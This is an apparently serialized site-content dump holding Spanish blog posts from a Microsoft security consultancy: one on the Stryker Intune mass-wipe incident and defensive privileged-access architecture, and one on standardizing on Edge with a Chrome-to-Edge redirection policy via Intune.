un compromiso de todo lo que esa identidad puede alcanzar. Phishing, robo de credenciales mediante malware infostealer, robo de tokens de sesión adversary-in-the-middle (AiTM): todos se convierten en una ruta directa hacia los controles más poderosos de su entorno. No se necesita escalada de privilegios. El atacante simplemente usa lo que ya está ahí.",[12,20856,20857],{},"En el caso de Stryker, ese acceso incluía un tenant de Intune que gestionaba dispositivos en seis continentes.",[41,20859,20861],{"id":20860},"cisa-ha-visto-suficiente","CISA ha visto suficiente",[12,20863,31],{},[12,20865,20866],{},"La escala y la audacia del ataque provocaron una respuesta inusual: CISA, la Agencia de Ciberseguridad e Infraestructura de EE. UU., emitió orientaciones que abordan directamente el riesgo de las plataformas de gestión de dispositivos comprometidas. La agencia confirmó que conocía el vector de ataque e instó a las organizaciones a tomar medidas concretas, asegurando que las funciones de alto impacto de Intune, como el borrado de dispositivos, requieran la aprobación de un segundo administrador antes de ejecutarse.",[12,20868,20869],{},"Esta es una señal rara y significativa. Cuando una agencia federal de seguridad emite orientaciones específicas inmediatamente después de un incidente concreto, el mensaje es claro: esto no es un caso excepcional. Es un patrón, y otras organizaciones probablemente tienen la misma exposición.",[41,20871,20873],{"id":20872},"la-separación-no-es-un-lujo-es-el-control","La separación no es un lujo. Es el control.",[12,20875,31],{},[12,20877,20878],{},"El ataque Stryker es un caso de estudio útil precisamente porque ilustra el radio de explosión de un modelo de privilegios plano. El atacante no necesitó escalar privilegios a través de una cadena de vulnerabilidades. Obtuvo acceso a credenciales, o a un token de sesión, en un nivel y encontró que ese nivel ya era suficiente para causar un daño catastrófico, global e irreversible.",[12,20880,20881],{},"La respuesta arquitectónica a este problema tiene un nombre: el Microsoft Enterprise Access Model (EAM). Su principio central es la administración por niveles: las operaciones privilegiadas se realizan utilizando cuentas dedicadas y dispositivos dedicados, estrictamente separados del contexto de trabajo cotidiano. Este enfoque de mínimo privilegio significa que una cuenta de productividad comprometida no puede alcanzar el plano de gestión, y una cuenta de gestión comprometida no puede alcanzar las operaciones del plano de control. Esto se aplica igualmente a entornos exclusivamente en la nube y a configuraciones híbridas que incluyen conexión a Active Directory local a través de Entra ID, donde una única cuenta con exceso de privilegios puede seguir uniendo la nube y el dominio.",[12,20883,20884],{},"La idea es sencilla. El trabajo administrativo se realiza en dispositivos administrativos. La identidad utilizada para gestionar su tenant de Microsoft 365, su entorno de Intune o su infraestructura de Azure nunca es la misma identidad utilizada para leer correos electrónicos o asistir a llamadas de Teams. El dispositivo utilizado para esas sesiones administrativas está reforzado, restringido y aislado del contexto habitual de navegación por Internet y productividad que crea la exposición. El movimiento lateral se vuelve estructuralmente más difícil porque no existe ninguna ruta lateral.",[41,20886,20888],{"id":20887},"dos-capas-de-defensa","Dos capas de defensa",[12,20890,31],{},[12,20892,20893],{},"Abordar correctamente este modelo de amenaza requiere trabajar simultáneamente en dos niveles: asegurar quién puede acceder al plano de gestión y a sus credenciales, y reforzar cómo ese plano de gestión mismo está configurado y operado. No son el mismo problema, y ambos importan.",[12,20895,20896],{},[2772,20897],{"alt":20898,"src":20899},"Mapeo de riesgos y productos para el escenario del ataque Stryker: Managed Red Tenant aborda los riesgos de identidad y acceso, Managed Intune aborda los riesgos de gestión de endpoints","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[186,20901,20903],{"id":20902},"managed-red-tenant-proteger-el-contexto-administrativo","Managed Red Tenant: proteger el contexto administrativo",[12,20905,47],{},[12,20907,20908,20909,1014],{},"La primera capa es aislar completamente el acceso privilegiado. Para eso está diseñado nuestro ",[2630,20910,20912],{"href":20911},"/es/security/managed-red-tenant","Managed Red Tenant",[12,20914,20915],{},"El Managed Red Tenant proporciona un entorno administrativo completamente aislado y basado en la nube: un tenant dedicado de Microsoft Entra («el Red Tenant») utilizado exclusivamente para operaciones privilegiadas. Las identidades administrativas residen aquí. Los dispositivos administrativos se gestionan aquí. Nada del entorno de trabajo habitual se filtra.",[12,20917,20918],{},"Para los roles más críticos — aquellos con acceso al plano de control, como los administradores globales — implementamos el enfoque «Clean Keyboard»: una Privileged Admin Workstation (PAW) física con hardware dedicado, políticas reforzadas y sin ninguna exposición al contexto de trabajo cotidiano. Para roles administrativos más amplios, ofrecemos Virtual Access Workstations (VAW) escalables construidas sobre una infraestructura reforzada de Azure Virtual Desktop dentro del Red Tenant. La propia ruta de acceso está protegida a través de Microsoft Entra Private Access, aplicando Zero Trust Network Access y políticas de acceso condicional antes de que se pueda establecer cualquier sesión.",[12,20920,20921],{},"Microsoft Entra Internet Access bloquea el acceso a internet público desde las sesiones administrativas y restringe la conectividad estrictamente a interfaces privilegiadas y entornos de tenant autorizados. La revocación de sesiones en tiempo casi real es posible a través de Universal Conditional Access Evaluation, lo que significa que una credencial revocada no persiste como sesión válida.",[12,20923,20924,20925,20928],{},"El Managed Red Tenant está supervisado 24/7 por nuestro ",[2630,20926,20927],{"href":2874},"Cloud Security Operations Center (CSOC)",", con detecciones desarrolladas específicamente en torno a permisos administrativos y patrones de acceso. Un atacante que de alguna manera comprometiera una credencial en este entorno no tendría tres horas sin ser detectado para ejecutar comandos de borrado en una flota global de dispositivos.",[12,20930,20931],{},"Esto es especialmente relevante para roles como los administradores de Intune. Saben cómo proteger los clientes, pero proteger una estación de trabajo de administrador privilegiado requiere un conjunto de habilidades diferente — arquitectura de acceso empresarial, refuerzo de identidades, controles Zero Trust — que normalmente recae en el equipo de seguridad. Un Managed Red Tenant elimina esa carga por completo: los administradores de Intune obtienen una estación de trabajo gestionada profesionalmente y reforzada de forma consistente sin necesidad de convertirse en expertos en estaciones de trabajo seguras. Lo mismo se aplica a cualquier rol altamente privilegiado en la organización.",[20172,20933],{"thumb":20934,"alt":20935,"id":20936,":full-width":7656},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer y Thomas Naunheim debaten la estrategia de ciberseguridad de Managed Red Tenant","rOEIvItNkjE",[52,20938,20939,20940],{"style":20179},"Más en nuestro ",[2630,20941,20945],{"href":20942,"target":2633,"rel":20943},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[20944],"noopener","canal de YouTube",[186,20947,20949],{"id":20948},"managed-intune-reforzar-el-propio-plano-de-gestión","Managed Intune: reforzar el propio plano de gestión",[12,20951,47],{},[12,20953,20954,20955,1014],{},"La segunda capa es garantizar que Intune — la herramienta que fue utilizada como arma en el ataque Stryker — esté configurada, operada y mantenida continuamente según el estándar de seguridad más alto. Para eso está nuestro servicio ",[2630,20956,20958],{"href":20957},"/es/entra-intune/managed-intune","Managed Intune",[12,20960,20961],{},"Uno de los hallazgos centrales de incidentes como el de Stryker es que las organizaciones a menudo heredan entornos de Intune que han crecido de forma orgánica a lo largo del tiempo: políticas apiladas sobre políticas, cambios manuales realizados a través del portal que son difíciles de auditar, y baselines de seguridad que no han seguido el ritmo de las propias recomendaciones cambiantes de Microsoft. Ese tipo de entorno es exactamente donde la deriva de configuración crea brechas explotables.",[12,20963,20964,20965,20970],{},"Microsoft ha publicado recientemente ",[2630,20966,20969],{"href":20967,"rel":20968},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[3135],"mejores prácticas para proteger Microsoft Intune"," — una señal oportuna de que incluso Microsoft considera que el refuerzo de Intune es un tema que necesita atención explícita en toda la industria. Nuestro servicio Managed Intune está construido exactamente sobre estos principios, y hemos implementado las recomendaciones de Microsoft como parte de nuestra baseline.",[12,20972,20973],{},"Nuestro servicio Managed Intune se basa en la glueckkanja Intune Foundation: un conjunto probado y mantenido continuamente de mejores prácticas para la gestión de dispositivos, entregado íntegramente como código utilizando Terraform y nuestro propio TerraProvider. Cada cambio está automatizado, con control de versiones y es auditable. No existen configuraciones no documentadas de tipo «hacer clic en el portal» que un atacante pueda explotar al comprender la brecha entre lo que se pretendía y lo que se configuró.",[12,20975,20976],{},"Desde una perspectiva de seguridad, esto significa que las configuraciones de Zero Trust, las App Protection Policies y la seguridad de endpoints se aplican por diseño, de forma consistente, en Windows, macOS, iOS y Android: no como implementaciones únicas, sino como baselines evergreen aplicadas continuamente que siguen la evolución de las propias guías de seguridad de Microsoft.",[12,20978,20979],{},"Fundamentalmente, Managed Intune refleja la madurez operativa necesaria para proteger la gestión moderna de endpoints: monitorización continua del cumplimiento, gobierno estructurado de cambios y revisiones periódicas del servicio — no como extras opcionales, sino como operaciones de baseline. Pero proteger la configuración de Intune es solo la mitad del problema. Si el administrador que accede a la consola lo hace desde un dispositivo desprotegido, el plano de gestión sigue expuesto, independientemente — y es exactamente ahí donde el Managed Red Tenant completa el modelo.",[12,20981,20982],{},"Dado que todas las configuraciones se despliegan como código basado en la Intune Foundation, aplicamos un estricto principio de cuatro ojos con revisión por pares, validación automatizada adicional y pipelines de despliegue controlados. Esto elimina los cambios no gestionados en el portal dentro de la Intune Foundation y garantiza una baseline consistente, auditable y segura en todos los dispositivos.",[12,20984,20985],{},"El acceso administrativo se rige por un modelo de mínimo privilegio utilizando GDAP y Azure Lighthouse, con responsabilidades claramente definidas y acceso estrictamente delimitado al tenant del cliente. Esto reduce significativamente la superficie de ataque asociada con las operaciones privilegiadas.",[12,20987,20988],{},"Las acciones a nivel de dispositivo, incluidas las operaciones destructivas, siguen siendo responsabilidad del cliente, ya que su ejecución está estrechamente vinculada a los procesos específicos de la organización y a los marcos de gobernanza interna. Microsoft y CISA recomiendan proteger dichas acciones mediante salvaguardas adicionales, como los controles de aprobación de múltiples administradores dentro de Intune.",[41,20990,20992],{"id":20991},"la-pregunta-incómoda","La pregunta incómoda",[12,20994,31],{},[12,20996,20997],{},"El ataque Stryker no es una acusación contra Microsoft Intune. Intune se comportó exactamente como fue diseñado. Ejecutó los comandos que recibió de un administrador autenticado. El fallo no estaba en la herramienta. Estaba en la ausencia de controles sobre quién podía acceder a esa herramienta, desde qué contexto y con qué nivel de autorización.",[12,20999,21000],{},"Es un problema de gobernanza y arquitectura. Y es el mismo problema que existe en la mayoría de las organizaciones que ejecutan Microsoft 365 hoy en día.",[12,21002,21003],{},"Si sus administradores acceden a Intune, Entra ID o Azure desde los mismos dispositivos e identidades que utilizan para el trabajo diario — y si su entorno de Intune ha crecido a través de años de cambios manuales en el portal en lugar de un modelo operativo estructurado y automatizado — está cargando con el mismo riesgo estructural que cargaba Stryker el 10 de marzo. La pregunta es si un adversario encontrará esa exposición antes de que usted la aborde.",[12,21005,21006,21008,21009,21011],{},[2630,21007,20912],{"href":20911}," aborda la capa de privilegios e identidad. ",[2630,21010,20958],{"href":20957}," aborda la capa de configuración y operaciones. Juntos, cierran las dos brechas que hicieron posible el ataque Stryker.",[12,21013,21014],{},"Si quiere entender cómo cualquiera de los servicios se aplica a su entorno actual, o dónde están sus puntos de exposición específicos, estaremos encantados de analizarlo con usted.",[12,21016,21017],{},"También publicaremos en breve un artículo detallado que examina cómo fue posible que ocurriera el incidente Stryker en primer lugar.",[41,21019,4444],{"id":21020},"más-información",[12,21022,31],{},[1255,21024,21025,21032,21038,21045],{},[1258,21026,21027],{},[2630,21028,21031],{"href":21029,"rel":21030},"https://www.cisa.gov/secure-cloud-business-applications",[3135],"CISA: Securing Cloud Business Applications",[1258,21033,21034],{},[2630,21035,21037],{"href":20967,"rel":21036},[3135],"Microsoft: Mejores prácticas para proteger Microsoft Intune",[1258,21039,21040],{},[2630,21041,21044],{"href":21042,"rel":21043},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[3135],"TechCrunch: CISA insta a las empresas a proteger los sistemas Microsoft Intune tras el borrado masivo de dispositivos Stryker por parte de hackers",[1258,21046,21047],{},[2630,21048,21051],{"href":21049,"rel":21050},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[3135],"Managed Red Tenant en Azure Marketplace",{"title":65,"searchDepth":111,"depth":111,"links":21053},[21054,21055,21056,21057,21058,21062,21063],{"id":20827,"depth":111,"text":20828},{"id":20842,"depth":111,"text":20843},{"id":20860,"depth":111,"text":20861},{"id":20872,"depth":111,"text":20873},{"id":20887,"depth":111,"text":20888,"children":21059},[21060,21061],{"id":20902,"depth":329,"text":20903},{"id":20948,"depth":329,"text":20949},{"id":20991,"depth":111,"text":20992},{"id":21020,"depth":111,"text":4444},{"lang":2170,"seoTitle":21065,"titleClass":2172,"date":21066,"categories":21067,"blogtitlepic":21068,"socialimg":21069,"customExcerpt":21070,"keywords":21071,"hreflang":21072,"asideNav":21079,"contactInContent":21094,"maxContent":2167,"published":2180},"El Ataque Stryker: Cómo una Cuenta de Administrador Comprometida Borró 80.000 Dispositivos a través de Intune","2026-03-20",[2175],"head-stryker.jpg","/blog/heads/head-stryker.jpg","El 11 de marzo de 2026, Handala borró dispositivos en 79 países utilizando únicamente una cuenta de administrador de Intune comprometida. Sin malware, sin exploit, solo herramientas legítimas de gestión convertidas en un arma. Esto es lo que sucedió, por qué funcionó y cómo se pueden cerrar las dos brechas arquitectónicas que lo hicieron posible.","ataque Stryker, Handala, Microsoft Intune wipe, gestión de acceso privilegiado, estación de trabajo de administrador, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, seguridad de gestión de endpoints",[21073,21075,21077],{"lang":2260,"href":21074},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2170,"href":21076},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2257,"href":21078},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":21080},[21081,21083,21085,21087,21090,21092],{"href":21082,"text":20828},"#lo-que-realmente-ocurrio",{"href":21084,"text":20843},"#por-que-tuvo-exito-este-ataque",{"href":21086,"text":20861},"#cisa-ha-visto-suficiente",{"href":21088,"text":21089},"#la-separacion-no-es-un-lujo-es-el-control","La separación no es un lujo",{"href":21091,"text":20888},"#dos-capas-de-defensa",{"href":21093,"text":20992},"#la-pregunta-incomoda",{"quote":2180,"infos":21095},{"bgColor":2200,"headline":21096,"subline":21097,"level":41,"textStyling":2203,"flush":2204,"person":21098,"form":21100},"Contáctenos","¿Quiere saber cómo Managed Red Tenant y Managed Intune cierran las brechas que explotó el ataque Stryker? Rellene el formulario y le explicaremos cómo se aplica a su entorno.",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":21099},"El ataque Stryker es una llamada de atención para todas las organizaciones que utilizan Microsoft Intune. La herramienta hizo exactamente lo que se le indicó. El problema fue que nadie debería haber podido indicárselo: no desde una cuenta cotidiana comprometida, no sin una segunda aprobación, no sin un entorno administrativo aislado. Esa es la brecha que ayudamos a cerrar.",{"ctaText":2212,"cta":21101,"method":2168,"action":2215,"fields":21102},{"skin":2214},[21103,21105,21107,21109,21112,21115,21116,21117,21119,21120,21121],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":21104},"Por favor, introduzca su nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":21106},"Por favor, introduzca su empresa.",{"label":2226,"type":2227,"id":2227,"required":2180,"requiredMsg":21108},"Por favor, introduzca su dirección de correo electrónico.",{"label":21110,"type":2231,"id":2232,"required":2167,"requiredMsg":21111},"Su mensaje para nosotros","Por favor, introduzca un mensaje.",{"label":21113,"type":2236,"id":2237,"required":2180,"requiredMsg":21114},"Sus datos serán almacenados y utilizados para responder a su solicitud. Para más información, consulte nuestra \u003Ca href=\"/es/privacy\">Política de privacidad\u003C/a>.","Por favor, confirme",{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":21118},"Form: Blog Stryker Attack Intune Privilege | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":20815,"description":20821},"posts/2026-03-20-stryker-attack-intune-privilege",[18399,21126,3439],"Privileged Access","8SGuheZh7VmiwYg_o_cs7OBIREEj6gDVPhczOorybMo",{"id":21129,"title":21130,"author":21131,"body":21132,"cta":2165,"description":21136,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":21320,"moment":21322,"navigation":2180,"path":21349,"seo":21350,"stem":21351,"tags":2165,"webcast":2167,"__hash__":21352},"content_es/posts/2026-03-21-microsoft-edge-corporate-browser.md","Por qué Edge debería ser vuestro único navegador corporativo",[2330],{"type":9,"value":21133,"toc":21312},[21134,21137,21140,21142,21148,21152,21154,21157,21161,21163,21166,21180,21184,21186,21192,21198,21201,21243,21251,21255,21257,21265,21276,21278,21280,21283,21309],[12,21135,21136],{},"En entornos empresariales, la elección del navegador no es un detalle menor. Determina cuánta seguridad, cuánto esfuerzo de gestión y cuánta productividad obtenéis en la práctica. Google Chrome ha sido durante mucho tiempo la opción obvia, pero Microsoft Edge ha evolucionado hasta ofrecer ventajas reales, especialmente cuando Microsoft 365 está en uso y la gestión se hace a través de Microsoft Intune.",[41,21138,18270],{"id":21139},"seguridad",[12,21141,31],{},[12,21143,21144,21145,21147],{},"Un Microsoft Edge gestionado garantiza que las funciones de seguridad se apliquen de forma coherente en todos los endpoints. Con integración nativa en Microsoft Defender SmartScreen, Edge protege frente a phishing, malware y otras amenazas. A través de Intune, las directivas pueden ajustarse con precisión: controlar el comportamiento, bloquear extensiones de riesgo y aplicar prácticas de navegación segura. ",[2630,21146,20958],{"href":20957}," de glueckkanja incluye directivas de Edge actualizadas y alineadas con las líneas base de seguridad de Microsoft.",[41,21149,21151],{"id":21150},"sincronización-con-entra-id","Sincronización con Entra ID",[12,21153,31],{},[12,21155,21156],{},"Edge sincroniza de forma segura datos de usuario como favoritos, contraseñas y configuraciones entre dispositivos mediante cuentas de Entra ID. Esto es especialmente relevante en entornos de trabajo híbrido, donde los empleados cambian entre portátiles corporativos, escritorios virtuales y dispositivos móviles sin perder contexto ni productividad.",[41,21158,21160],{"id":21159},"complejidad-por-usar-varios-navegadores","Complejidad por usar varios navegadores",[12,21162,31],{},[12,21164,21165],{},"Mantener Google Chrome junto a Edge crea trabajo adicional:",[1255,21167,21168,21174],{"style":20160},[1258,21169,21170,21173],{},[251,21171,21172],{},"Copia de seguridad y sincronización:"," Otros navegadores suelen requerir cuentas de terceros, como una cuenta de Google, para habilitar la sincronización.",[1258,21175,21176,21179],{},[251,21177,21178],{},"Mantenimiento de directivas:"," Cada navegador necesita su propio conjunto de directivas de seguridad y configuración. Eso consume recursos, aumenta el riesgo de errores de configuración y complica las auditorías.",[41,21181,21183],{"id":21182},"redirección-de-chrome-via-intune","Redirección de Chrome via Intune",[12,21185,31],{},[12,21187,21188,21189,21191],{},"Para llevar a los usuarios de Chrome a Edge, se puede configurar una directiva de redirección mediante Microsoft Intune, disponible en minutos a través de ",[2630,21190,20958],{"href":20957}," de glueckkanja. Los usuarios llegan a una página que presenta Microsoft Edge como el navegador corporativo predeterminado, con un enlace directo para abrirlo.",[12,21193,21194],{},[2772,21195],{"alt":21196,"src":21197},"Microsoft Edge como navegador corporativo predeterminado","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[12,21199,21200],{},"La directiva de configuración define cómo se restringe y redirige Chrome:",[1255,21202,21203,21216,21225,21231,21237],{"style":20160},[1258,21204,21205,21208,21209,21212,21213,1014],{},[251,21206,21207],{},"Lista de URLs permitidas:"," Solo se permiten URLs concretas, como la página de destino ",[63,21210,21211],{},"https://edge.glueckkanja.com/"," y el moniker ",[63,21214,21215],{},"microsoft-edge:*",[1258,21217,21218,21221,21222,21224],{},[251,21219,21220],{},"Lista de URLs bloqueadas:"," Todas las demás URLs quedan bloqueadas (",[63,21223,1292],{},"), lo que impide la navegación general en Chrome.",[1258,21226,21227,21230],{},[251,21228,21229],{},"Página de inicio y nueva pestaña:"," Ambas apuntan a la página de destino, que invita a usar Edge.",[1258,21232,21233,21236],{},[251,21234,21235],{},"Gestión de protocolos:"," Al hacer clic en URLs de la página de destino, Chrome abre Edge automáticamente.",[1258,21238,21239,21242],{},[251,21240,21241],{},"Control de extensiones:"," Configuraciones adicionales impiden la instalación de extensiones.",[12,21244,21245,21246],{},"Ejemplo de directiva para descargar: ",[2630,21247,21250],{"href":21248,"rel":21249},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[3135],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[41,21252,21254],{"id":21253},"página-de-destino-via-github-pages","Página de destino via GitHub Pages",[12,21256,31],{},[12,21258,21259,21260],{},"La página funciona con GitHub Pages. Quien quiera adaptarla puede hacerlo directamente en el proyecto: ",[2630,21261,21264],{"href":21262,"rel":21263},"https://github.com/glueckkanja/edge-redirection-landingpage",[3135],"edge-redirection-landingpage",[12,21266,21267],{},[2630,21268,21273],{"role":3058,"className":21269,"dataText":21270,"href":21271,"target":2633,"rel":21272,"type":3068},[3060,3061,3064,3065],"Ver la página de destino","https://edge.glueckkanja.com",[20944],[102,21274,21270],{"className":21275},[3072],[41,21277,17323],{"id":17322},[12,21279,31],{},[12,21281,21282],{},"Microsoft Edge ofrece un entorno de navegación seguro y gestionable con integración profunda en Microsoft 365, lo que lo convierte en la elección lógica como navegador corporativo predeterminado. Las principales ventajas:",[1255,21284,21285,21288,21291,21294,21297,21300,21303,21306],{"style":20160},[1258,21286,21287],{},"Integración con Entra ID y SSO",[1258,21289,21290],{},"Sincronización y copia de seguridad en la nube mediante la cuenta de Microsoft 365 en varias plataformas",[1258,21292,21293],{},"Ecosistema de seguridad integrado con Microsoft Defender SmartScreen y Microsoft Endpoint DLP",[1258,21295,21296],{},"Compatibilidad con Intune App Protection Policies",[1258,21298,21299],{},"Gestión del navegador desde el centro de administración de Microsoft 365 e Intune",[1258,21301,21302],{},"Modo Internet Explorer para aplicaciones heredadas",[1258,21304,21305],{},"Personalización corporativa",[1258,21307,21308],{},"Integración de Copilot",[12,21310,21311],{},"Estandarizarse en Edge reduce la complejidad, refuerza la seguridad y simplifica el soporte. Ampliar el enfoque de redirección a otros navegadores es un paso siguiente que tiene sentido.",{"title":65,"searchDepth":111,"depth":111,"links":21313},[21314,21315,21316,21317,21318,21319],{"id":21139,"depth":111,"text":18270},{"id":21150,"depth":111,"text":21151},{"id":21159,"depth":111,"text":21160},{"id":21182,"depth":111,"text":21183},{"id":21253,"depth":111,"text":21254},{"id":17322,"depth":111,"text":17323},{"lang":2170,"seoTitle":21321,"titleClass":2172,"date":21322,"blogtitlepic":21323,"socialimg":21324,"customExcerpt":21325,"keywords":21326,"hreflang":21327,"published":2180,"asideNav":21334},"Microsoft Edge como navegador corporativo seguro: seguridad, sincronización y redirección de Chrome via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","El navegador que nadie eligió deliberadamente es hoy el que todos tienen que gestionar. La mayoría de las empresas nunca tomaron una decisión activa por Chrome; simplemente estaba ahí, con su propia lógica de sincronización, su propia capa de cuentas, su propia superficie de directivas. Microsoft Edge es otra cosa: un navegador que se integra directamente en la infraestructura que las empresas ya tienen. Entra ID, Intune, Defender. Esta entrada muestra cómo hacer ese cambio, cómo redirigir Chrome a una página de destino mediante una directiva de Intune y qué desaparece cuando se deja de mantener dos navegadores en paralelo.","Microsoft Edge, navegador corporativo, Microsoft Intune, Entra ID, redirección de Chrome, Managed Intune, directiva de navegador, Microsoft Defender SmartScreen, navegador empresarial, gestión de navegadores, lista de bloqueo de URL, lista de URLs permitidas",[21328,21330,21332],{"lang":2260,"href":21329},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2257,"href":21331},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2170,"href":21333},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":21335},[21336,21338,21340,21343,21345,21347],{"href":21337,"text":18270},"#seguridad",{"href":21339,"text":21151},"#sincronización-con-entra-id",{"href":21341,"text":21342},"#complejidad-por-usar-varios-navegadores","Complejidad por varios navegadores",{"href":21344,"text":21183},"#redirección-de-chrome-via-intune",{"href":21346,"text":21254},"#página-de-destino-via-github-pages",{"href":21348,"text":17323},"#conclusión","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":21130,"description":21136},"posts/2026-03-21-microsoft-edge-corporate-browser","4dzPrCmYa_qBIk_LjU-Qvt9euryPlP8X7fC0e5Rif1s",{"id":4,"title":5,"author":21354,"body":21355,"cta":2165,"description":14,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":22824,"moment":2173,"navigation":2180,"path":2264,"seo":22855,"stem":2266,"tags":22856,"webcast":2167,"__hash__":2273},[7],{"type":9,"value":21356,"toc":22788},[21357,21359,21361,21363,21365,21367,21369,21371,21373,21375,21377,21379,21381,21388,21390,21392,21399,21401,21403,21405,21407,21421,21423,21430,21432,21439,21443,21445,21447,21449,21456,21464,21466,21468,21470,21472,21474,21481,21483,21485,21492,21494,21496,21498,21500,21502,21504,21511,21513,21515,21519,21521,21585,21587,21613,21615,21617,21619,21623,21625,21627,21629,21685,21687,21689,21695,21699,21741,21747,21751,21753,21755,21801,21803,21805,21809,21811,21813,21815,21819,21833,21955,21957,21964,21970,21972,21979,21987,21995,21997,21999,22001,22011,22025,22163,22165,22172,22174,22176,22178,22180,22182,22184,22238,22240,22250,22300,22302,22304,22306,22308,22310,22314,22352,22354,22361,22363,22365,22367,22369,22373,22381,22415,22423,22457,22463,22471,22473,22475,22477,22479,22483,22485,22492,22494,22501,22509,22511,22513,22515,22517,22523,22525,22527,22537,22544,22552,22564,22566,22568,22570,22577,22579,22586,22594,22596,22598,22600,22607,22617,22621,22623,22625,22632,22636,22640,22642,22644,22651,22653,22655,22657,22664,22666,22668,22670,22677,22679,22681,22688,22690,22692,22699,22701,22703,22710,22722,22726,22728,22730,22732,22736,22750,22752,22760,22762,22764,22766,22768,22770,22772,22774,22786],[12,21358,14],{},[12,21360,17],{},[12,21362,20],{},[22,21364],{},[25,21366,28],{"id":27},[12,21368,31],{},[12,21370,34],{},[12,21372,37],{},[22,21374],{},[41,21376,44],{"id":43},[12,21378,47],{},[12,21380,50],{},[52,21382,21383],{"style":54},[56,21384,21386],{"className":21385,"code":60,"language":61},[59],[63,21387,60],{"__ignoreMap":65},[12,21389,68],{},[12,21391,71],{},[52,21393,21394],{"style":54},[56,21395,21397],{"className":21396,"code":77,"language":61},[59],[63,21398,77],{"__ignoreMap":65},[12,21400,82],{},[41,21402,86],{"id":85},[12,21404,47],{},[12,21406,91],{},[52,21408,21409],{"style":54},[56,21410,21411],{"className":96,"code":97,"language":98,"meta":65,"style":65},[63,21412,21413,21417],{"__ignoreMap":65},[102,21414,21415],{"class":104,"line":105},[102,21416,108],{},[102,21418,21419],{"class":104,"line":111},[102,21420,114],{},[12,21422,117],{},[52,21424,21425],{"style":54},[56,21426,21428],{"className":21427,"code":123,"language":61},[59],[63,21429,123],{"__ignoreMap":65},[12,21431,128],{},[52,21433,21434],{"style":54},[56,21435,21437],{"className":21436,"code":134,"language":61},[59],[63,21438,134],{"__ignoreMap":65},[12,21440,139,21441,143],{},[63,21442,142],{},[41,21444,147],{"id":146},[12,21446,47],{},[12,21448,152],{},[52,21450,21451],{"style":54},[56,21452,21454],{"className":21453,"code":158,"language":61},[59],[63,21455,158],{"__ignoreMap":65},[12,21457,163,21458,167,21460,171,21462,175],{},[63,21459,166],{},[63,21461,170],{},[63,21463,174],{},[41,21465,179],{"id":178},[12,21467,47],{},[12,21469,184],{},[186,21471,189],{"id":188},[12,21473,192],{},[52,21475,21476],{"style":54},[56,21477,21479],{"className":21478,"code":198,"language":61},[59],[63,21480,198],{"__ignoreMap":65},[186,21482,204],{"id":203},[12,21484,192],{},[52,21486,21487],{"style":54},[56,21488,21490],{"className":21489,"code":212,"language":61},[59],[63,21491,212],{"__ignoreMap":65},[186,21493,218],{"id":217},[12,21495,192],{},[12,21497,223],{},[186,21499,227],{"id":226},[12,21501,192],{},[12,21503,232],{},[52,21505,21506],{"style":54},[56,21507,21509],{"className":21508,"code":238,"language":61},[59],[63,21510,238],{"__ignoreMap":65},[186,21512,244],{"id":243},[12,21514,192],{},[12,21516,249,21517,254],{},[251,21518,253],{},[12,21520,257],{},[52,21522,21523],{"style":54},[56,21524,21525],{"className":262,"code":263,"language":264,"meta":65,"style":65},[63,21526,21527,21547,21565,21577],{"__ignoreMap":65},[102,21528,21529,21531,21533,21535,21537,21539,21541,21543,21545],{"class":104,"line":105},[102,21530,272],{"class":271},[102,21532,276],{"class":275},[102,21534,279],{"class":275},[102,21536,282],{"class":275},[102,21538,286],{"class":285},[102,21540,290],{"class":289},[102,21542,294],{"class":293},[102,21544,297],{"class":285},[102,21546,300],{"class":289},[102,21548,21549,21551,21553,21555,21557,21559,21561,21563],{"class":104,"line":111},[102,21550,305],{"class":271},[102,21552,308],{"class":275},[102,21554,311],{"class":275},[102,21556,314],{"class":275},[102,21558,317],{"class":275},[102,21560,320],{"class":275},[102,21562,323],{"class":289},[102,21564,326],{"class":275},[102,21566,21567,21569,21571,21573,21575],{"class":104,"line":329},[102,21568,332],{"class":275},[102,21570,335],{"class":289},[102,21572,338],{"class":275},[102,21574,341],{"class":289},[102,21576,326],{"class":275},[102,21578,21579,21581,21583],{"class":104,"line":346},[102,21580,349],{"class":275},[102,21582,352],{"class":289},[102,21584,355],{"class":289},[12,21586,358],{},[52,21588,21589],{"style":54},[56,21590,21591],{"className":262,"code":363,"language":264,"meta":65,"style":65},[63,21592,21593,21607],{"__ignoreMap":65},[102,21594,21595,21597,21599,21601,21603,21605],{"class":104,"line":105},[102,21596,370],{"class":271},[102,21598,373],{"class":275},[102,21600,286],{"class":285},[102,21602,290],{"class":289},[102,21604,294],{"class":293